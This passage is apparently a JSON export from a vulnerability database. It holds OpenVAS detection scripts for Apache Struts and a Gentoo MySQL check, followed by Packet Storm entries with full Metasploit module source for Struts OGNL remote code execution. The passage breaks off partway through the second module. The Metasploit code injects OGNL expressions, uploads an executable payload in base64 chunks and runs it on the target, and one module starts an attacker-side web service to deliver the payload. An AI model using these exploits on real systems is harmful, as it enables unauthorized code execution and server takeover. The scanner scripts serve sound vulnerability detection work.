2.0.0 to 2.3.15\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts 2 version 2.3.15.1 or later,\n For updates refer to http://struts.apache.org\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/54118\");\n script_xref(name : \"URL\" , value : \"http://seclists.org/fulldisclosure/2013/Jul/157\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-016.html\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-017.html\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/release/2.3.x/docs/version-notes-23151.html\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Variable Initialization\nasport = 0;\nasreq = \"\";\nasres = \"\";\nres = \"\";\nreq = \"\";\nresult = \"\";\ndir = \"\";\nurl = \"\";\n\n## Get HTTP Port\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\n## Send and Receive the response\nasreq = http_get(item:string(dir,\"/showcase.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\n\n## Confirm the application\nif(asres && \">Struts2 Showcase<\" >< asres && \">Welcome!<\" >< asres)\n{\n calc = make_list(2, 3);\n\n foreach i (calc)\n {\n ## Construct attack request\n url = dir + \"/showcase.action?redirect%3A%25%7B\"+ i +\"*5%7D\";\n\n req = http_get(item:url, port:asport);\n res = http_keepalive_send_recv(port:asport, data:req);\n\n if(res =~ \"HTTP/1.. 302\" && res =~ \"Location:.*/([0-9]+)?\")\n {\n result = eregmatch(pattern: string(dir, \"/([0-9]+)?\"), string:res);\n\n if ( !result || result[1] >!< i * 5 ) exit(0);\n }\n else exit(0);\n }\n security_message(port:asport);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:04", "description": "This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.", "cvss3": {}, "published": "2013-07-24T00:00:00", "type": "openvas", "title": "Apache Struts2 Redirection and Security Bypass Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310803838", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803838", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_mult_redirect_vuln.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Apache Struts2 Redirection and Security Bypass Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803838\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-2248\", \"CVE-2013-2251\");\n script_bugtraq_id(61196, 61189);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-24 11:58:54 +0530 (Wed, 24 Jul 2013)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts2 Redirection and Security Bypass Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an expression along with the redirect command\n via HTTP GET request and check whether it is redirecting and solve the expression or not.\");\n\n script_tag(name:\"insight\", value:\"Flaws are due to improper sanitation of 'action:',\n 'redirect:', and 'redirectAction:' prefixing parameters before being used in\n DefaultActionMapper.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attacker\n to execute arbitrary arbitrary Java code via OGNL (Object-Graph Navigation Language)\n or redirect user to a malicious url.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts 2.0.0 to 2.3.15\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts 2 version 2.3.15.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54118\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2013/Jul/157\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/development/2.x/docs/s2-016.html\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/development/2.x/docs/s2-017.html\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/release/2.3.x/docs/version-notes-23151.html\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nasreq = http_get(item:string(dir,\"/showcase.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\n\nif(asres && \">Struts2 Showcase<\" >< asres && \">Welcome!<\" >< asres)\n{\n calc = make_list(2, 3);\n\n foreach i (calc)\n {\n url = dir + \"/showcase.action?redirect%3A%25%7B\"+ i +\"*5%7D\";\n\n req = http_get(item:url, port:asport);\n res = http_keepalive_send_recv(port:asport, data:req);\n\n if(res =~ \"HTTP/1.. 302\" && res =~ \"Location:.*/([0-9]+)?\")\n {\n result = eregmatch(pattern: string(dir, \"/([0-9]+)?\"), string:res);\n\n if ( !result || result[1] >!< i * 5 ) exit(0);\n }\n else exit(0);\n }\n security_message(port:asport);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:17", "description": "This host is running Apache Struts and is\n prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-06-06T00:00:00", "type": "openvas", "title": "Apache Struts Multiple Vulnerabilities June16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2162", "CVE-2016-4003", "CVE-2016-3093"], "modified": "2018-10-18T00:00:00", "id": "OPENVAS:1361412562310808021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808021", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_mult_vuln_june16.nasl 58255 2016-06-06 11:03:24 +0530 June$\n#\n# Apache Struts Multiple Vulnerabilities June16\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808021\");\n script_version(\"$Revision: 11969 $\");\n script_cve_id(\"CVE-2016-4003\", \"CVE-2016-2162\", \"CVE-2016-3093\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 16:53:42 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-06 11:03:24 +0530 (Mon, 06 Jun 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Apache Struts Multiple Vulnerabilities June16\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist as,\n\n - The Apache Struts frameworks when forced, performs double evaluation of\n attributes' values assigned to certain tags so it is possible to pass in\n a value that will be evaluated again when a tag's attributes will be\n rendered.\n\n - The interceptor doesn't perform any validation of the user input and accept\n arbitrary string which can be used by a developer to display language\n selected by the user.\n\n - The application does not properly validate cache method references when used\n with OGNL before 3.0.12\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to inject arbitrary web script or HTML via multi-byte characters\n in a url-encoded parameter or a denial of service (block access to a web site)\n via unspecified vectors.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x through 2.3.24.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.28 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/docs/s2-030.html\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/docs/s2-028.html\");\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-034.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\n## Vulnerable version according to Advisory\nif(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.24.1\"))\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"2.3.28\");\n security_message(data:report, port:appPort);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:33", "description": "Gentoo Linux Local Security Checks GLSA 201409-04", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201409-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-3839", "CVE-2013-5807", "CVE-2013-5860", "CVE-2014-2440", "CVE-2014-2432", "CVE-2014-2419", "CVE-2014-0393", "CVE-2014-0431", "CVE-2014-0427", "CVE-2014-2436", "CVE-2014-0433", "CVE-2014-0401", "CVE-2014-2434", "CVE-2014-2435", "CVE-2013-1861", "CVE-2014-2431", "CVE-2013-5882", "CVE-2014-0437", "CVE-2013-5881", "CVE-2014-0412", "CVE-2013-5891", "CVE-2013-2134", "CVE-2014-0402", "CVE-2014-2430", "CVE-2014-0420", "CVE-2014-0430", "CVE-2013-5786", "CVE-2013-5894", "CVE-2014-0001", "CVE-2013-5770", "CVE-2014-2438", "CVE-2014-0384", "CVE-2013-5908", "CVE-2014-0386", "CVE-2013-5767", "CVE-2013-5793"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121267", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121267", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201409-04.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121267\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:52 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201409-04\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in MySQL. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201409-04\");\n script_cve_id(\"CVE-2013-1861\", \"CVE-2013-2134\", \"CVE-2013-3839\", \"CVE-2013-5767\", \"CVE-2013-5770\", \"CVE-2013-5786\", \"CVE-2013-5793\", \"CVE-2013-5807\", \"CVE-2013-5860\", \"CVE-2013-5881\", \"CVE-2013-5882\", \"CVE-2013-5891\", \"CVE-2013-5894\", \"CVE-2013-5908\", \"CVE-2014-0001\", \"CVE-2014-0384\", \"CVE-2014-0386\", \"CVE-2014-0393\", \"CVE-2014-0401\", \"CVE-2014-0402\", \"CVE-2014-0412\", \"CVE-2014-0420\", \"CVE-2014-0427\", \"CVE-2014-0430\", \"CVE-2014-0431\", \"CVE-2014-0433\", \"CVE-2014-0437\", \"CVE-2014-2419\", \"CVE-2014-2430\", \"CVE-2014-2431\", \"CVE-2014-2432\", \"CVE-2014-2434\", \"CVE-2014-2435\", \"CVE-2014-2436\", \"CVE-2014-2438\", \"CVE-2014-2440\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201409-04\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-db/mysql\", unaffected: make_list(\"ge 5.5.39\"), vulnerable: make_list(\"lt 5.5.39\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:28", "description": "", "cvss3": {}, "published": "2013-06-02T00:00:00", "type": "packetstorm", "title": "Apache Struts includeParams Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2013-06-02T00:00:00", "id": "PACKETSTORM:121847", "href": "https://packetstormsecurity.com/files/121847/Apache-Struts-includeParams-Remote-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts includeParams Remote Code Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in Apache Struts \nversions < 2.3.14.2. A specifically crafted request parameter can be used to inject \narbitrary OGNL code into the stack bypassing Struts and OGNL library protections. \nWhen targeting an action which requires interaction through GET the payload should \nbe split having into account the uri limits. In this case, if the rendered jsp has \nmore than one point of injection, it could result in payload corruption. It should \nhappen only when the payload is larger than the uri length. \n}, \n'Author' => \n[ \n# This vulnerability was also discovered by unknown members of: \n# 'Coverity security Research Laboratory' \n# 'NSFOCUS Security Team' \n'Eric Kobrin', # Vulnerability Discovery \n'Douglas Rodrigues', # Vulnerability Discovery \n'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-2115'], \n[ 'CVE', '2013-1966'], \n[ 'OSVDB', '93645'], \n[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'], \n[ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html'] \n], \n'Platform' => [ 'win', 'linux', 'java'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n}, \n] \n], \n'DisclosureDate' => 'May 24 2013', \n'DefaultTarget' => 2)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]), \nOptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', \"/struts2-blank/example/HelloWorld.action\"]), \nOptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]), \nOptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \ninject_string = @inject.gsub(/CMD/,cmd) \nuri = normalize_uri(target_uri.path) \nreq_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] } \ncase datastore['HTTPMETHOD'] \nwhen 'POST' \nreq_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }}) \nwhen 'GET' \nreq_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }}) \nend \n \n# Display a nice \"progress bar\" instead of message spam \ncase @notify_flag \nwhen 0 \nprint_status(\"Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload\") \n@notify_flag = 1 \nwhen 1 \nprint(\".\") # Progress dots \nwhen 2 \nprint_status(\"Payload upload complete\") \nend \n \nreturn send_request_cgi(req_hash) #Used for check function. \nend \n \ndef exploit \n#initialise some base vars \n@inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\" \n@java_upload_part_cmd = \"#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()\" \n#Set up generic values. \n@payload_exe = rand_text_alphanumeric(4+rand(4)) \npl_exe = generate_payload_exe \nappend = false \n#Now arch specific... \ncase target['Platform'] \nwhen 'linux' \n@payload_exe = \"/tmp/#{@payload_exe}\" \nchmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\" \nwhen 'java' \n@payload_exe << \".jar\" \npl_exe = payload.encoded_jar.pack \nexec_cmd = \"\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,true),\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,false),\" \nexec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\" \nexec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\" \nexec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\" \nexec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\" \nwhen 'windows' \n@payload_exe = \"./#{@payload_exe}.exe\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\" \nelse \nfail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!') \nend \n \nprint_status(\"Preparing payload...\") \n# Now with all the arch specific stuff set, perform the upload. \n# Need to calculate amount to allocate for non-dynamic parts of the URL. \n# Fixed strings are tokens used for substitutions. \nappend_length = append ? \"true\".length : \"false\".length # Gets around the boolean/string issue \nsub_from_chunk = append_length + ( @java_upload_part_cmd.length - \"FILENAME\".length - \"APPEND\".length - \"BUFFER\".length ) \nsub_from_chunk += ( @inject.length - \"CMD\".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length \ncase datastore['HTTPMETHOD'] \nwhen 'GET' \nchunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the \"static\" URL items. \n#This lets us know the length remaining for our base64'd payloads \nchunk_length = ((chunk_length/4).floor)*3 \nwhen 'POST' \nchunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore. \nend \n@notify_flag = 0 \nwhile pl_exe.length > chunk_length \njava_upload_part(pl_exe[0,chunk_length],@payload_exe,append) \npl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] \nappend = true \nend \njava_upload_part(pl_exe,@payload_exe,append) \nexecute_command(chmod_cmd) if target['Platform'] == 'linux' \nprint_line() # new line character, after progress bar. \n@notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file. \nexecute_command(exec_cmd) \nregister_files_for_cleanup(@payload_exe) \nend \n \ndef java_upload_part(part, filename, append = false) \ncmd = @java_upload_part_cmd.gsub(/FILENAME/,filename) \nappend = append ? \"true\" : \"false\" # converted for the string replacement. \ncmd = cmd.gsub!(/APPEND/,append) \ncmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part)) \nexecute_command(cmd) \nend \n \ndef check \n#initialise some base vars \n@inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\" \nprint_status(\"Performing Check...\") \nsleep_time = datastore['CHECK_SLEEPTIME'] \ncheck_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\" \nt1 = Time.now \nprint_status(\"Asking remote server to sleep for #{sleep_time} seconds\") \nresponse = execute_command(check_cmd) \nt2 = Time.now \ndelta = t2 - t1 \n \n \nif response.nil? \nreturn Exploit::CheckCode::Safe \nelsif delta < sleep_time \nreturn Exploit::CheckCode::Safe \nelse \nreturn Exploit::CheckCode::Appears \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/121847/struts_include_params.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:13:37", "description": "", "cvss3": {}, "published": "2013-07-25T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2013-07-25T00:00:00", "id": "PACKETSTORM:122541", "href": "https://packetstormsecurity.com/files/122541/Apache-Struts-2-DefaultActionMapper-Prefixes-OGNL-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution', \n'Description' => %q{ \nThe Struts 2 DefaultActionMapper supports a method for short-circuit navigation \nstate changes by prefixing parameters with \"action:\" or \"redirect:\", followed by \na desired navigational target expression. This mechanism was intended to help with \nattaching navigational information to buttons within forms. \n \nIn Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or \n\"redirectAction:\" is not properly sanitized. Since said information will be \nevaluated as OGNL expression against the value stack, this introduces the \npossibility to inject server side code. \n \nThis module has been tested successfully on Struts 2.3.15 over Tomcat 7, with \nWindows 2003 SP2 and Ubuntu 10.04 operating systems. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Takeshi Terada', # Vulnerability discovery \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit modules \n], \n'References' => \n[ \n[ 'CVE', '2013-2251' ], \n[ 'OSVDB', '95405' ], \n[ 'BID', '61189' ], \n[ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ] \n], \n'Platform' => [ 'win', 'linux'], \n'Targets' => \n[ \n['Automatic', {}], \n['Windows', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n] \n], \n'DefaultOptions' => \n{ \n'WfsDelay' => 10 \n}, \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'DisclosureDate' => 'Jul 2 2013', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']), \nOptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]), \n# It isn't OptPath becuase it's a *remote* path \nOptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ]) \n], self.class) \nend \n \ndef on_new_session(session) \nif session.type == \"meterpreter\" \nsession.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\") \nend \n \n@dropped_files.delete_if do |file| \nfalse unless file =~ /\\.exe/ \nwin_file = file.gsub(\"/\", \"\\\\\\\\\") \nif session.type == \"meterpreter\" \nbegin \nwintemp = session.fs.file.expand_path(\"%TEMP%\") \nwin_file = \"#{wintemp}\\\\#{win_file}\" \nsession.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|) \nsession.fs.file.rm(win_file) \nprint_good(\"Deleted #{file}\") \ntrue \nrescue ::Rex::Post::Meterpreter::RequestError \nprint_error(\"Failed to delete #{win_file}\") \nfalse \nend \nend \nend \n \nsuper \nend \n \ndef start_http_service \n#do not use SSL \nif datastore['SSL'] \nssl_restore = true \ndatastore['SSL'] = false \nend \n \nif (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\") \nsrv_host = Rex::Socket.source_address(rhost) \nelse \nsrv_host = datastore['SRVHOST'] \nend \n \nservice_url = srv_host + ':' + datastore['SRVPORT'].to_s \nprint_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\") \nstart_service({ \n'Uri' => { \n'Proc' => Proc.new { |cli, req| \non_request_uri(cli, req) \n}, \n'Path' => '/' \n} \n}) \n \ndatastore['SSL'] = true if ssl_restore \n \nreturn service_url \nend \n \ndef check \nuri = normalize_uri(target_uri.path) \nres = send_request_cgi({ \n'uri' => uri, \n'method' => 'GET' \n}) \n \nif res.nil? or res.code != 200 \nprint_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\") \nreturn Exploit::CheckCode::Unknown \nend \n \nproof = rand_text_alpha(6 + rand(4)) \n \nres = send_request_cgi({ \n'uri' => \"#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}\", \n'method' => 'GET' \n}) \n \nif res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Unknown \nend \n \ndef auto_target \nuri = 